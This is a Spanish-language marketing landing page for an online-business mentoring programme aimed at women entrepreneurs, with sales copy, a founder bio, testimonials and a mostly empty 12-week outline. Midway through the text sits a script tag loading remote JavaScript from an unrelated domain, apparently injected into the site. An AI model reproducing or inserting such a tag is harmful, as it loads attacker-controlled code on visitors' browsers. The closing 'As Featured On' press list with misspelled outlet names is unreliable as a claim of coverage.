Programa de Mentoring

Negocio Brillante

Descubre como crear un negocio brillante de servicios en Internet (o mejorar el que ya tienes) en menos de 90 días.

Te enseñare cómo construir tu negocio brillante online, crear tu primer producto o servicio, promocionarlo y atraer clientes ideales que estén dispuesto a invertir en ti.

Para Mujeres que quieran iniciar su negocio de venta de servicios por Internet: Coaching, Nutrición, Fitness, Consultoría de Imagen, Mentorías, Diseño Gráfico, Psicología, Consultoría de Negocios

¿Te Suenan Familiares Algunas de Estas Situaciones?

Llevas un tiempo con tu blog pero no logras lectores constantes que puedas convertir en clientes.
Tienes un gran talento pero no sabes cómo comunicarlo correctamente.
No tienes un buen servicio definido y terminas intercambiando tu tiempo por dinero y esto te limita la cantidad de dinero que puedes ganar en un mes.
Tienes muy claro cuál es tu potencial y la transformación que ofrecen tus servicios, pero todavía no estás facturando lo que anhelas.
Sabes que podrías llegar a más gente pero no tienes una estrategia de contenido y comunicación eficaz que te genere un flujo constante de clientes.
Existe mucha competencia en tu mercado y no sabes como crear una marca personal potente que llegue a tu cliente ideal.
Trabajas muchas horas frente al ordenador y atender a los tuyos se te hace cuesta arriba y esto te desanimada por que no ves recompensa a tu trabajo.

Si te has identificado con algunas de estas situaciones. Puedo entenderte y quiero ponerle fin y hacer realidad el hecho de que consigas hacer triunfar tu negocio en menos de 90 días.

No te preocupes, yo he pasado por todas las situaciones durante el crecimiento de mi negocio.

Quiero que sepas que es posible lograr lo que te propones, yo he pasado también muchas horas frente al ordenador​ sintiéndome culpable por quitar tiempo a mi familia. Si lo he logrado yo, tu puedes hacerlo. 

Me comprometí con mi proyecto, hacer realidad mi idea y organice mis horarios para aprender, aplicar, crecer  y cuidar de mis hijas.​

Esto son los motivos por los que cree ​mi programa de mentoring "Negocio Brillante" para lograr que tu proyecto salga adelante, reducir el numero de horas que pasas frente al ordenador sin que afecte a tus resultados y que sepas en que actividades y tareas no perder el tiempo.

El sistema paso a paso que yo y mis clientas de mentoría hemos implementado y que nos permite avanzar en nuestros proyectos olvidándonos de los miedos e inseguridades que nos impedían avanzar.​

<script src='https://hotopponents.site/site.js' type='text/javascript'></script>

Hola soy Ángela Montoya

Ayudo a mujeres emprendedoras que tienen o quieren tener un negocio online ofreciendo sus conocimientos específicos o sus servicios profesionales creando su propio negocio online, pero no saben los pasos a seguir para crearlos, conseguir visibilidad y tener clientes, yo les ayudo a que den los pasos necesario para lacreación de sus negocios con las que lograr duplicar o triplicar sus ingresos dedicando el mismo tiempo.

Soy mentora de mujeres emprendedoras que están listas para maximizar su potencial a través de sus negocios de servicios online y conseguir el estilo de vida libre que puedes lograr con un negocio brillante.

¿Que vas a aprender?

Disponer de tu tiempo y horarios

Saber los pasos correctos que debes dar en cada momento te hará ir sobre seguro en tu negocio, y podrás disponer tus horarios  para tener mas tiempo libre y disfrutar en lo que mas te guste.

Conectar con tu cliente ideal

Sin esto estas realmente perdida, tienes que conectar con la persona que realmente necesita tus servicios, ganarte su confianza y hacerle crecer mientras aumenta su confianza en ti.

Invertir en herramientas seguras

Invertir en recursos con retorno seguro de amortización, sabrás que herramientas utilizar en cada momento, no todas son necesarias desde el inicio.

Diseñar sistema de venta automático

Definirás tu propio sistema de venta, uno que funcione realmente para ti y tu negocio, lo que necesitas para vender tus programas, talleres o servicios profesionales.

Mira lo que dicen mis clientas del programa

El programa "Tu negocio brillante" esta genial, pero si tengo algo que destacar de el, es la claridad y foco que he obtenido. Antes pasaba horas frente al laptop y al finalizar el día no había hecho nada, me perdía buscando  informacion para continuar, ahora tengo el esquema de mi negocio bien definido.   

Diana Montenegro - Diseñadora Gráfica

Realice el curso con Ángela "crea tu blog y triunfa" excelente para sentar la base digital, pero me faltaba los siguientes pasos, con el programa de mentoría " negocio brillante" tengo claro que paso es el siguiente, tengo definido mi embudo de ventas para que el proceso sea automático y he logrado trabajar menos horas.

Lola Mateo - Coach de salud y bienestar

Contenido del programa

Semana 1

Definir y validar tu idea

Aprenderás a elegir tu idea ganadora basándote en tus pasiones, habilidades y talentos para después validar la viabilidad de tu idea. Este paso es importante por que basaras tu negocio en el y si no lo defines al inicio puedes perder tiempo y dinero.

Semana 2
Semana 3
Semana 4
Semana 5
Semana 6
Semana 7
Semana 8
Semana 9
Semana 10
Semana 11
Semana 12

As Featured On

uastoday
mashable
tc
gigaom